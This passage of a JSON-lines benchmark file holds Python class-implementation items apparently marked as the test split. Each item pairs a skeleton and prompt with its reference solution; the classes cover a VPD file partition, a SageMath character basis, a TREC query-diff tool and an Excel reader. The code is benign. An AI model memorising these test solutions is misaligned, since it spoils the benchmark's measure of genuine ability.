self._device.path.join(self._path, key)\n if self._device.path.exists(file_path):\n self._device.CheckCall(['rm', '-f', file_path])\n return\n<|end_body_0|>\n\n<|body_start_1|>\n for k, v in items.items():\n file_name = self._device.path.join(self._path, k)\n if v is not None:\n dir_name = self._device.path.dirname(file_name)\n self._device.CheckCall(['mkdir', '-p', dir_name])\n self._device.WriteFile(file_name, v)\n else:\n self._device.CheckCall(['rm', '-f', file_name])\n self._device.CheckCall(['sync'])\n<|end_body_1|>\n", "revision_id": "a1b0fccd68987d8cd9c89710adc3c04b868347ec", "skeleton": "<|skeleton|>\nclass MutableFileBasedPartition:\n \"\"\"A file-based VPD partition.\"\"\"\n\n def Delete(self, *keys):\n \"\"\"See Partition.Delete.\"\"\"\n <|body_0|>\n\n def Update(self, items, log=True):\n \"\"\"See Partition.Update.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MutableFileBasedPartition:\n \"\"\"A file-based VPD partition.\"\"\"\n\n def Delete(self, *keys):\n \"\"\"See Partition.Delete.\"\"\"\n for key in keys:\n file_path = self._device.path.join(self._path, key)\n if self._device.path.exists(file_path):\n self._device.CheckCall(['rm', '-f', file_path])\n return\n\n def Update(self, items, log=True):\n \"\"\"See Partition.Update.\"\"\"\n for k, v in items.items():\n file_name = self._device.path.join(self._path, k)\n if v is not None:\n dir_name = self._device.path.dirname(file_name)\n self._device.CheckCall(['mkdir', '-p', dir_name])\n self._device.WriteFile(file_name, v)\n else:\n self._device.CheckCall(['rm', '-f', file_name])\n self._device.CheckCall(['sync'])\n", "source": "the_stack_v2_python_sparse", "source_path": "py/device/vpd.py", "source_repo": "bridder/factory", "split": "test", "star_events_count": 0} {"blob_id": "f6a9da15cd7d656815adf5d4625f848a44487e39", "bodies": ["SFA_generic.__init__(self, Sym, basis_name=bname, prefix=pfix, graded=False)\nself._other = other_basis\nself.module_morphism(self._self_to_other_on_basis, codomain=self._other).register_as_coercion()\nself.register_coercion(SetMorphism(Hom(self._other, self), self._other_to_self))", "if not lam:\n return self._other([])\nn = sum(lam) + lam[0]\nsim = self._other(self._other(lam).character_to_frobenius_image(n))\nreturn self._other(lam) - sum((c * self._self_to_other_on_basis(Partition(mu[1:])) for mu, c in sim if mu[1:] != lam))"], "bodies_text": "<|body_start_0|>\n SFA_generic.__init__(self, Sym, basis_name=bname, prefix=pfix, graded=False)\n self._other = other_basis\n self.module_morphism(self._self_to_other_on_basis, codomain=self._other).register_as_coercion()\n self.register_coercion(SetMorphism(Hom(self._other, self), self._other_to_self))\n<|end_body_0|>\n\n<|body_start_1|>\n if not lam:\n return self._other([])\n n = sum(lam) + lam[0]\n sim = self._other(self._other(lam).character_to_frobenius_image(n))\n return self._other(lam) - sum((c * self._self_to_other_on_basis(Partition(mu[1:])) for mu, c in sim if mu[1:] != lam))\n<|end_body_1|>\n", "class_docstring": "General code for a character basis (irreducible and induced trivial). This is a basis of the symmetric functions that has the property that ``self(la).character_to_frobenius_image(n)`` is equal to ``other([n-sum(la)]+la)``. It should also have the property that the (outer) structure constants are the analogue of the stable Kronecker coefficients on the ``other`` basis (where ``other`` is either the Schur or homogeneous bases). These bases are introduced in [OZ2015]_. EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: s = Sym.s() sage: h = Sym.h() sage: ht = SymmetricFunctions(QQ).ht() sage: st = SymmetricFunctions(QQ).st() sage: ht(s[2,1]) ht[1, 1] + ht[2, 1] - ht[3] sage: s(ht[2,1]) s[1] -", "class_name": "character_basis", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass character_basis:\n \"\"\"General code for a character basis (irreducible and induced trivial). This is a basis of the symmetric functions that has the property that ``self(la).character_to_frobenius_image(n)`` is equal to ``other([n-sum(la)]+la)``. It should also have the property that the (outer) structure constants are the analogue of the stable Kronecker coefficients on the ``other`` basis (where ``other`` is either the Schur or homogeneous bases). These bases are introduced in [OZ2015]_. EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: s = Sym.s() sage: h = Sym.h() sage: ht = SymmetricFunctions(QQ).ht() sage: st = SymmetricFunctions(QQ).st() sage: ht(s[2,1]) ht[1, 1] + ht[2, 1] - ht[3] sage: s(ht[2,1]) s[1] -\"\"\"\n\n def __init__(self, Sym, other_basis, bname, pfix):\n \"\"\"Initialize the basis and register coercions. The coercions are set up between the ``other_basis``. INPUT: - ``Sym`` -- an instance of the symmetric function algebra - ``other_basis`` -- a basis of Sym - ``bname`` -- the name for this basis (convention: ends in \"character\") - ``pfix`` -- a prefix to use for the basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht(); ht Symmetric Functions over Rational Field in the induced trivial character basis sage: st = SymmetricFunctions(QQ).st(); st Symmetric Functions over Rational Field in the irreducible symmetric group character basis sage: TestSuite(ht).run()\"\"\"\n <|body_0|>\n\n def _self_to_other_on_basis(self, lam):\n \"\"\"Convert a character-basis element to the ``self._other`` basis. This is a recursive procedure that is calculated by the assumption that the leading term of ``self(lam)`` is ``other(lam)`` and ``evalsf(self(lam),n) == other([n-sum(lam)]+lam)``. INPUT: - ``lam`` -- a partition OUTPUT: - an expression in the ``self._other`` basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht() sage: ht._self_to_other_on_basis(Partition([2,1])) h[1] - 2*h[1, 1] + h[2, 1] sage: st = SymmetricFunctions(QQ).st() sage: st._self_to_other_on_basis(Partition([2,1])) 3*s[1] - 2*s[1, 1] - 2*s[2] + s[2, 1] TESTS:: sage: h = SymmetricFunctions(QQ).h() sage: ht = SymmetricFunctions(QQ).h\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n SFA_generic.__init__(self, Sym, basis_name=bname, prefix=pfix, graded=False)\n self._other = other_basis\n self.module_morphism(self._self_to_other_on_basis, codomain=self._other).register_as_coercion()\n self.register_coercion(SetMorphism(Hom(self._other, self), self._other_to_self))\n<|end_body_0|>\n\n<|body_start_1|>\n if not lam:\n return self._other([])\n n = sum(lam) + lam[0]\n sim = self._other(self._other(lam).character_to_frobenius_image(n))\n return self._other(lam) - sum((c * self._self_to_other_on_basis(Partition(mu[1:])) for mu, c in sim if mu[1:] != lam))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000246", "length_bytes": 16482, "license_type": "no_license", "methods": [{"docstring": "Initialize the basis and register coercions. The coercions are set up between the ``other_basis``. INPUT: - ``Sym`` -- an instance of the symmetric function algebra - ``other_basis`` -- a basis of Sym - ``bname`` -- the name for this basis (convention: ends in \"character\") - ``pfix`` -- a prefix to use for the basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht(); ht Symmetric Functions over Rational Field in the induced trivial character basis sage: st = SymmetricFunctions(QQ).st(); st Symmetric Functions over Rational Field in the irreducible symmetric group character basis sage: TestSuite(ht).run()", "name": "__init__", "signature": "def __init__(self, Sym, other_basis, bname, pfix)"}, {"docstring": "Convert a character-basis element to the ``self._other`` basis. This is a recursive procedure that is calculated by the assumption that the leading term of ``self(lam)`` is ``other(lam)`` and ``evalsf(self(lam),n) == other([n-sum(lam)]+lam)``. INPUT: - ``lam`` -- a partition OUTPUT: - an expression in the ``self._other`` basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht() sage: ht._self_to_other_on_basis(Partition([2,1])) h[1] - 2*h[1, 1] + h[2, 1] sage: st = SymmetricFunctions(QQ).st() sage: st._self_to_other_on_basis(Partition([2,1])) 3*s[1] - 2*s[1, 1] - 2*s[2] + s[2, 1] TESTS:: sage: h = SymmetricFunctions(QQ).h() sage: ht = SymmetricFunctions(QQ).h", "name": "_self_to_other_on_basis", "signature": "def _self_to_other_on_basis(self, lam)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003941", "prompt": "Implement the Python class `character_basis` described below.\n\nClass description:\nGeneral code for a character basis (irreducible and induced trivial). This is a basis of the symmetric functions that has the property that ``self(la).character_to_frobenius_image(n)`` is equal to ``other([n-sum(la)]+la)``. It should also have the property that the (outer) structure constants are the analogue of the stable Kronecker coefficients on the ``other`` basis (where ``other`` is either the Schur or homogeneous bases). These bases are introduced in [OZ2015]_. EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: s = Sym.s() sage: h = Sym.h() sage: ht = SymmetricFunctions(QQ).ht() sage: st = SymmetricFunctions(QQ).st() sage: ht(s[2,1]) ht[1, 1] + ht[2, 1] - ht[3] sage: s(ht[2,1]) s[1] -\n\nMethod signatures and docstrings:\n- def __init__(self, Sym, other_basis, bname, pfix): Initialize the basis and register coercions. The coercions are set up between the ``other_basis``. INPUT: - ``Sym`` -- an instance of the symmetric function algebra - ``other_basis`` -- a basis of Sym - ``bname`` -- the name for this basis (convention: ends in \"character\") - ``pfix`` -- a prefix to use for the basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht(); ht Symmetric Functions over Rational Field in the induced trivial character basis sage: st = SymmetricFunctions(QQ).st(); st Symmetric Functions over Rational Field in the irreducible symmetric group character basis sage: TestSuite(ht).run()\n- def _self_to_other_on_basis(self, lam): Convert a character-basis element to the ``self._other`` basis. This is a recursive procedure that is calculated by the assumption that the leading term of ``self(lam)`` is ``other(lam)`` and ``evalsf(self(lam),n) == other([n-sum(lam)]+lam)``. INPUT: - ``lam`` -- a partition OUTPUT: - an expression in the ``self._other`` basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht() sage: ht._self_to_other_on_basis(Partition([2,1])) h[1] - 2*h[1, 1] + h[2, 1] sage: st = SymmetricFunctions(QQ).st() sage: st._self_to_other_on_basis(Partition([2,1])) 3*s[1] - 2*s[1, 1] - 2*s[2] + s[2, 1] TESTS:: sage: h = SymmetricFunctions(QQ).h() sage: ht = SymmetricFunctions(QQ).h", "prompted_full_text": "Implement the Python class `character_basis` described below.\n\nClass description:\nGeneral code for a character basis (irreducible and induced trivial). This is a basis of the symmetric functions that has the property that ``self(la).character_to_frobenius_image(n)`` is equal to ``other([n-sum(la)]+la)``. It should also have the property that the (outer) structure constants are the analogue of the stable Kronecker coefficients on the ``other`` basis (where ``other`` is either the Schur or homogeneous bases). These bases are introduced in [OZ2015]_. EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: s = Sym.s() sage: h = Sym.h() sage: ht = SymmetricFunctions(QQ).ht() sage: st = SymmetricFunctions(QQ).st() sage: ht(s[2,1]) ht[1, 1] + ht[2, 1] - ht[3] sage: s(ht[2,1]) s[1] -\n\nMethod signatures and docstrings:\n- def __init__(self, Sym, other_basis, bname, pfix): Initialize the basis and register coercions. The coercions are set up between the ``other_basis``. INPUT: - ``Sym`` -- an instance of the symmetric function algebra - ``other_basis`` -- a basis of Sym - ``bname`` -- the name for this basis (convention: ends in \"character\") - ``pfix`` -- a prefix to use for the basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht(); ht Symmetric Functions over Rational Field in the induced trivial character basis sage: st = SymmetricFunctions(QQ).st(); st Symmetric Functions over Rational Field in the irreducible symmetric group character basis sage: TestSuite(ht).run()\n- def _self_to_other_on_basis(self, lam): Convert a character-basis element to the ``self._other`` basis. This is a recursive procedure that is calculated by the assumption that the leading term of ``self(lam)`` is ``other(lam)`` and ``evalsf(self(lam),n) == other([n-sum(lam)]+lam)``. INPUT: - ``lam`` -- a partition OUTPUT: - an expression in the ``self._other`` basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht() sage: ht._self_to_other_on_basis(Partition([2,1])) h[1] - 2*h[1, 1] + h[2, 1] sage: st = SymmetricFunctions(QQ).st() sage: st._self_to_other_on_basis(Partition([2,1])) 3*s[1] - 2*s[1, 1] - 2*s[2] + s[2, 1] TESTS:: sage: h = SymmetricFunctions(QQ).h() sage: ht = SymmetricFunctions(QQ).h\n\n<|skeleton|>\nclass character_basis:\n \"\"\"General code for a character basis (irreducible and induced trivial). This is a basis of the symmetric functions that has the property that ``self(la).character_to_frobenius_image(n)`` is equal to ``other([n-sum(la)]+la)``. It should also have the property that the (outer) structure constants are the analogue of the stable Kronecker coefficients on the ``other`` basis (where ``other`` is either the Schur or homogeneous bases). These bases are introduced in [OZ2015]_. EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: s = Sym.s() sage: h = Sym.h() sage: ht = SymmetricFunctions(QQ).ht() sage: st = SymmetricFunctions(QQ).st() sage: ht(s[2,1]) ht[1, 1] + ht[2, 1] - ht[3] sage: s(ht[2,1]) s[1] -\"\"\"\n\n def __init__(self, Sym, other_basis, bname, pfix):\n \"\"\"Initialize the basis and register coercions. The coercions are set up between the ``other_basis``. INPUT: - ``Sym`` -- an instance of the symmetric function algebra - ``other_basis`` -- a basis of Sym - ``bname`` -- the name for this basis (convention: ends in \"character\") - ``pfix`` -- a prefix to use for the basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht(); ht Symmetric Functions over Rational Field in the induced trivial character basis sage: st = SymmetricFunctions(QQ).st(); st Symmetric Functions over Rational Field in the irreducible symmetric group character basis sage: TestSuite(ht).run()\"\"\"\n <|body_0|>\n\n def _self_to_other_on_basis(self, lam):\n \"\"\"Convert a character-basis element to the ``self._other`` basis. This is a recursive procedure that is calculated by the assumption that the leading term of ``self(lam)`` is ``other(lam)`` and ``evalsf(self(lam),n) == other([n-sum(lam)]+lam)``. INPUT: - ``lam`` -- a partition OUTPUT: - an expression in the ``self._other`` basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht() sage: ht._self_to_other_on_basis(Partition([2,1])) h[1] - 2*h[1, 1] + h[2, 1] sage: st = SymmetricFunctions(QQ).st() sage: st._self_to_other_on_basis(Partition([2,1])) 3*s[1] - 2*s[1, 1] - 2*s[2] + s[2, 1] TESTS:: sage: h = SymmetricFunctions(QQ).h() sage: ht = SymmetricFunctions(QQ).h\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n SFA_generic.__init__(self, Sym, basis_name=bname, prefix=pfix, graded=False)\n self._other = other_basis\n self.module_morphism(self._self_to_other_on_basis, codomain=self._other).register_as_coercion()\n self.register_coercion(SetMorphism(Hom(self._other, self), self._other_to_self))\n<|end_body_0|>\n\n<|body_start_1|>\n if not lam:\n return self._other([])\n n = sum(lam) + lam[0]\n sim = self._other(self._other(lam).character_to_frobenius_image(n))\n return self._other(lam) - sum((c * self._self_to_other_on_basis(Partition(mu[1:])) for mu, c in sim if mu[1:] != lam))\n<|end_body_1|>\n", "revision_id": "0d9eacbf74e2acffefde93e39f8bcbec745cdaba", "skeleton": "<|skeleton|>\nclass character_basis:\n \"\"\"General code for a character basis (irreducible and induced trivial). This is a basis of the symmetric functions that has the property that ``self(la).character_to_frobenius_image(n)`` is equal to ``other([n-sum(la)]+la)``. It should also have the property that the (outer) structure constants are the analogue of the stable Kronecker coefficients on the ``other`` basis (where ``other`` is either the Schur or homogeneous bases). These bases are introduced in [OZ2015]_. EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: s = Sym.s() sage: h = Sym.h() sage: ht = SymmetricFunctions(QQ).ht() sage: st = SymmetricFunctions(QQ).st() sage: ht(s[2,1]) ht[1, 1] + ht[2, 1] - ht[3] sage: s(ht[2,1]) s[1] -\"\"\"\n\n def __init__(self, Sym, other_basis, bname, pfix):\n \"\"\"Initialize the basis and register coercions. The coercions are set up between the ``other_basis``. INPUT: - ``Sym`` -- an instance of the symmetric function algebra - ``other_basis`` -- a basis of Sym - ``bname`` -- the name for this basis (convention: ends in \"character\") - ``pfix`` -- a prefix to use for the basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht(); ht Symmetric Functions over Rational Field in the induced trivial character basis sage: st = SymmetricFunctions(QQ).st(); st Symmetric Functions over Rational Field in the irreducible symmetric group character basis sage: TestSuite(ht).run()\"\"\"\n <|body_0|>\n\n def _self_to_other_on_basis(self, lam):\n \"\"\"Convert a character-basis element to the ``self._other`` basis. This is a recursive procedure that is calculated by the assumption that the leading term of ``self(lam)`` is ``other(lam)`` and ``evalsf(self(lam),n) == other([n-sum(lam)]+lam)``. INPUT: - ``lam`` -- a partition OUTPUT: - an expression in the ``self._other`` basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht() sage: ht._self_to_other_on_basis(Partition([2,1])) h[1] - 2*h[1, 1] + h[2, 1] sage: st = SymmetricFunctions(QQ).st() sage: st._self_to_other_on_basis(Partition([2,1])) 3*s[1] - 2*s[1, 1] - 2*s[2] + s[2, 1] TESTS:: sage: h = SymmetricFunctions(QQ).h() sage: ht = SymmetricFunctions(QQ).h\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class character_basis:\n \"\"\"General code for a character basis (irreducible and induced trivial). This is a basis of the symmetric functions that has the property that ``self(la).character_to_frobenius_image(n)`` is equal to ``other([n-sum(la)]+la)``. It should also have the property that the (outer) structure constants are the analogue of the stable Kronecker coefficients on the ``other`` basis (where ``other`` is either the Schur or homogeneous bases). These bases are introduced in [OZ2015]_. EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: s = Sym.s() sage: h = Sym.h() sage: ht = SymmetricFunctions(QQ).ht() sage: st = SymmetricFunctions(QQ).st() sage: ht(s[2,1]) ht[1, 1] + ht[2, 1] - ht[3] sage: s(ht[2,1]) s[1] -\"\"\"\n\n def __init__(self, Sym, other_basis, bname, pfix):\n \"\"\"Initialize the basis and register coercions. The coercions are set up between the ``other_basis``. INPUT: - ``Sym`` -- an instance of the symmetric function algebra - ``other_basis`` -- a basis of Sym - ``bname`` -- the name for this basis (convention: ends in \"character\") - ``pfix`` -- a prefix to use for the basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht(); ht Symmetric Functions over Rational Field in the induced trivial character basis sage: st = SymmetricFunctions(QQ).st(); st Symmetric Functions over Rational Field in the irreducible symmetric group character basis sage: TestSuite(ht).run()\"\"\"\n SFA_generic.__init__(self, Sym, basis_name=bname, prefix=pfix, graded=False)\n self._other = other_basis\n self.module_morphism(self._self_to_other_on_basis, codomain=self._other).register_as_coercion()\n self.register_coercion(SetMorphism(Hom(self._other, self), self._other_to_self))\n\n def _self_to_other_on_basis(self, lam):\n \"\"\"Convert a character-basis element to the ``self._other`` basis. This is a recursive procedure that is calculated by the assumption that the leading term of ``self(lam)`` is ``other(lam)`` and ``evalsf(self(lam),n) == other([n-sum(lam)]+lam)``. INPUT: - ``lam`` -- a partition OUTPUT: - an expression in the ``self._other`` basis EXAMPLES:: sage: Sym = SymmetricFunctions(QQ) sage: ht = SymmetricFunctions(QQ).ht() sage: ht._self_to_other_on_basis(Partition([2,1])) h[1] - 2*h[1, 1] + h[2, 1] sage: st = SymmetricFunctions(QQ).st() sage: st._self_to_other_on_basis(Partition([2,1])) 3*s[1] - 2*s[1, 1] - 2*s[2] + s[2, 1] TESTS:: sage: h = SymmetricFunctions(QQ).h() sage: ht = SymmetricFunctions(QQ).h\"\"\"\n if not lam:\n return self._other([])\n n = sum(lam) + lam[0]\n sim = self._other(self._other(lam).character_to_frobenius_image(n))\n return self._other(lam) - sum((c * self._self_to_other_on_basis(Partition(mu[1:])) for mu, c in sim if mu[1:] != lam))\n", "source": "the_stack_v2_python_sparse", "source_path": "sage/src/sage/combinat/sf/character.py", "source_repo": "bopopescu/geosci", "split": "test", "star_events_count": 0} {"blob_id": "42c6755132e715958b21025cf490d7e4fad79cfa", "bodies": ["self.__run1_file = run1_file\nself.__run2_file = run2_file\nself.__qrels = qrels\nself.__metric = metric", "te_method1 = TrecEval()\nte_method1.evaluate(self.__qrels, self.__run1_file)\nte_method2 = TrecEval()\nte_method2.evaluate(self.__qrels, self.__run2_file)\ndata = []\nfor query_id in te_method1.get_query_ids():\n res1 = te_method1.get_score(query_id, self.__metric)\n res2 = te_method2.get_score(query_id, self.__metric)\n data.append([query_id, res1, res2, round(res2 - res1, 4)])\nsorted_data = sorted(data, key=lambda l: l[3], reverse=True)\nFileUtils.dump_tsv(output_file, sorted_data, header=['queryID', 'method1', 'method2', 'diff'])"], "bodies_text": "<|body_start_0|>\n self.__run1_file = run1_file\n self.__run2_file = run2_file\n self.__qrels = qrels\n self.__metric = metric\n<|end_body_0|>\n\n<|body_start_1|>\n te_method1 = TrecEval()\n te_method1.evaluate(self.__qrels, self.__run1_file)\n te_method2 = TrecEval()\n te_method2.evaluate(self.__qrels, self.__run2_file)\n data = []\n for query_id in te_method1.get_query_ids():\n res1 = te_method1.get_score(query_id, self.__metric)\n res2 = te_method2.get_score(query_id, self.__metric)\n data.append([query_id, res1, res2, round(res2 - res1, 4)])\n sorted_data = sorted(data, key=lambda l: l[3], reverse=True)\n FileUtils.dump_tsv(output_file, sorted_data, header=['queryID', 'method1', 'method2', 'diff'])\n<|end_body_1|>\n", "class_docstring": "", "class_name": "QueryDiff", "detected_licenses": ["BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass QueryDiff:\n\n def __init__(self, run1_file, run2_file, qrels, metric):\n \"\"\":param run1_file: name of run1 file (baseline) :param run2_file: name of run2 file (new method) :param qrels: name of qrels file :param metric: metric :return:\"\"\"\n <|body_0|>\n\n def dump_differences(self, output_file):\n \"\"\"Outputs query-level differences between two methods into a tab-separated file. The first method is considered the baseline, the differences are with respect to that. Output format: queryID res1 res2 diff(res2-res1)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.__run1_file = run1_file\n self.__run2_file = run2_file\n self.__qrels = qrels\n self.__metric = metric\n<|end_body_0|>\n\n<|body_start_1|>\n te_method1 = TrecEval()\n te_method1.evaluate(self.__qrels, self.__run1_file)\n te_method2 = TrecEval()\n te_method2.evaluate(self.__qrels, self.__run2_file)\n data = []\n for query_id in te_method1.get_query_ids():\n res1 = te_method1.get_score(query_id, self.__metric)\n res2 = te_method2.get_score(query_id, self.__metric)\n data.append([query_id, res1, res2, round(res2 - res1, 4)])\n sorted_data = sorted(data, key=lambda l: l[3], reverse=True)\n FileUtils.dump_tsv(output_file, sorted_data, header=['queryID', 'method1', 'method2', 'diff'])\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000247", "length_bytes": 1678, "license_type": "permissive", "methods": [{"docstring": ":param run1_file: name of run1 file (baseline) :param run2_file: name of run2 file (new method) :param qrels: name of qrels file :param metric: metric :return:", "name": "__init__", "signature": "def __init__(self, run1_file, run2_file, qrels, metric)"}, {"docstring": "Outputs query-level differences between two methods into a tab-separated file. The first method is considered the baseline, the differences are with respect to that. Output format: queryID res1 res2 diff(res2-res1)", "name": "dump_differences", "signature": "def dump_differences(self, output_file)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005780", "prompt": "Implement the Python class `QueryDiff` described below.\n\nClass description:\nImplement the QueryDiff class.\n\nMethod signatures and docstrings:\n- def __init__(self, run1_file, run2_file, qrels, metric): :param run1_file: name of run1 file (baseline) :param run2_file: name of run2 file (new method) :param qrels: name of qrels file :param metric: metric :return:\n- def dump_differences(self, output_file): Outputs query-level differences between two methods into a tab-separated file. The first method is considered the baseline, the differences are with respect to that. Output format: queryID res1 res2 diff(res2-res1)", "prompted_full_text": "Implement the Python class `QueryDiff` described below.\n\nClass description:\nImplement the QueryDiff class.\n\nMethod signatures and docstrings:\n- def __init__(self, run1_file, run2_file, qrels, metric): :param run1_file: name of run1 file (baseline) :param run2_file: name of run2 file (new method) :param qrels: name of qrels file :param metric: metric :return:\n- def dump_differences(self, output_file): Outputs query-level differences between two methods into a tab-separated file. The first method is considered the baseline, the differences are with respect to that. Output format: queryID res1 res2 diff(res2-res1)\n\n<|skeleton|>\nclass QueryDiff:\n\n def __init__(self, run1_file, run2_file, qrels, metric):\n \"\"\":param run1_file: name of run1 file (baseline) :param run2_file: name of run2 file (new method) :param qrels: name of qrels file :param metric: metric :return:\"\"\"\n <|body_0|>\n\n def dump_differences(self, output_file):\n \"\"\"Outputs query-level differences between two methods into a tab-separated file. The first method is considered the baseline, the differences are with respect to that. Output format: queryID res1 res2 diff(res2-res1)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.__run1_file = run1_file\n self.__run2_file = run2_file\n self.__qrels = qrels\n self.__metric = metric\n<|end_body_0|>\n\n<|body_start_1|>\n te_method1 = TrecEval()\n te_method1.evaluate(self.__qrels, self.__run1_file)\n te_method2 = TrecEval()\n te_method2.evaluate(self.__qrels, self.__run2_file)\n data = []\n for query_id in te_method1.get_query_ids():\n res1 = te_method1.get_score(query_id, self.__metric)\n res2 = te_method2.get_score(query_id, self.__metric)\n data.append([query_id, res1, res2, round(res2 - res1, 4)])\n sorted_data = sorted(data, key=lambda l: l[3], reverse=True)\n FileUtils.dump_tsv(output_file, sorted_data, header=['queryID', 'method1', 'method2', 'diff'])\n<|end_body_1|>\n", "revision_id": "7027699009504c72be4a087cf9730cad3051979b", "skeleton": "<|skeleton|>\nclass QueryDiff:\n\n def __init__(self, run1_file, run2_file, qrels, metric):\n \"\"\":param run1_file: name of run1 file (baseline) :param run2_file: name of run2 file (new method) :param qrels: name of qrels file :param metric: metric :return:\"\"\"\n <|body_0|>\n\n def dump_differences(self, output_file):\n \"\"\"Outputs query-level differences between two methods into a tab-separated file. The first method is considered the baseline, the differences are with respect to that. Output format: queryID res1 res2 diff(res2-res1)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class QueryDiff:\n def __init__(self, run1_file, run2_file, qrels, metric):\n \"\"\":param run1_file: name of run1 file (baseline) :param run2_file: name of run2 file (new method) :param qrels: name of qrels file :param metric: metric :return:\"\"\"\n self.__run1_file = run1_file\n self.__run2_file = run2_file\n self.__qrels = qrels\n self.__metric = metric\n\n def dump_differences(self, output_file):\n \"\"\"Outputs query-level differences between two methods into a tab-separated file. The first method is considered the baseline, the differences are with respect to that. Output format: queryID res1 res2 diff(res2-res1)\"\"\"\n te_method1 = TrecEval()\n te_method1.evaluate(self.__qrels, self.__run1_file)\n te_method2 = TrecEval()\n te_method2.evaluate(self.__qrels, self.__run2_file)\n data = []\n for query_id in te_method1.get_query_ids():\n res1 = te_method1.get_score(query_id, self.__metric)\n res2 = te_method2.get_score(query_id, self.__metric)\n data.append([query_id, res1, res2, round(res2 - res1, 4)])\n sorted_data = sorted(data, key=lambda l: l[3], reverse=True)\n FileUtils.dump_tsv(output_file, sorted_data, header=['queryID', 'method1', 'method2', 'diff'])\n", "source": "the_stack_v2_python_sparse", "source_path": "nordlys/core/eval/query_diff.py", "source_repo": "iai-group/nordlys", "split": "test", "star_events_count": 35} {"blob_id": "ba771789fee5f3c7d7b96e969701b7d7ba62430f", "bodies": ["if excel_path == None:\n current_path = os.path.abspath(os.path.dirname(__file__))\n self.excel_path = current_path + '/../data/casedata.xlsx'\nelse:\n self.excel_path = excel_path\nif sheet_name == None:\n self.sheet_name = 'Sheet'\nelse:\n self.sheet_name = sheet_name\nself.data = load_workbook(self.excel_path)\nself.sheet = self.data[self.sheet_name]", "rows = self.sheet.rows\nrow_num = self.sheet.max_row\ncol_num = self.sheet.max_column\nif row_num <= 1:\n print('总行数小于1,没有数据')\nelse:\n case_all = []\n for row in rows:\n case = []\n for i in range(col_num):\n case.append(row[i].value)\n case_all.append(case)\n return case_all"], "bodies_text": "<|body_start_0|>\n if excel_path == None:\n current_path = os.path.abspath(os.path.dirname(__file__))\n self.excel_path = current_path + '/../data/casedata.xlsx'\n else:\n self.excel_path = excel_path\n if sheet_name == None:\n self.sheet_name = 'Sheet'\n else:\n self.sheet_name = sheet_name\n self.data = load_workbook(self.excel_path)\n self.sheet = self.data[self.sheet_name]\n<|end_body_0|>\n\n<|body_start_1|>\n rows = self.sheet.rows\n row_num = self.sheet.max_row\n col_num = self.sheet.max_column\n if row_num <= 1:\n print('总行数小于1,没有数据')\n else:\n case_all = []\n for row in rows:\n case = []\n for i in range(col_num):\n case.append(row[i].value)\n case_all.append(case)\n return case_all\n<|end_body_1|>\n", "class_docstring": "", "class_name": "ExcelUtil", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ExcelUtil:\n\n def __init__(self, excel_path=None, sheet_name=None):\n \"\"\"获取excel工作表\"\"\"\n <|body_0|>\n\n def get_data(self) -> object:\n \"\"\"获取文件数据 每一行数据一个list,所有的数据一个大list :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if excel_path == None:\n current_path = os.path.abspath(os.path.dirname(__file__))\n self.excel_path = current_path + '/../data/casedata.xlsx'\n else:\n self.excel_path = excel_path\n if sheet_name == None:\n self.sheet_name = 'Sheet'\n else:\n self.sheet_name = sheet_name\n self.data = load_workbook(self.excel_path)\n self.sheet = self.data[self.sheet_name]\n<|end_body_0|>\n\n<|body_start_1|>\n rows = self.sheet.rows\n row_num = self.sheet.max_row\n col_num = self.sheet.max_column\n if row_num <= 1:\n print('总行数小于1,没有数据')\n 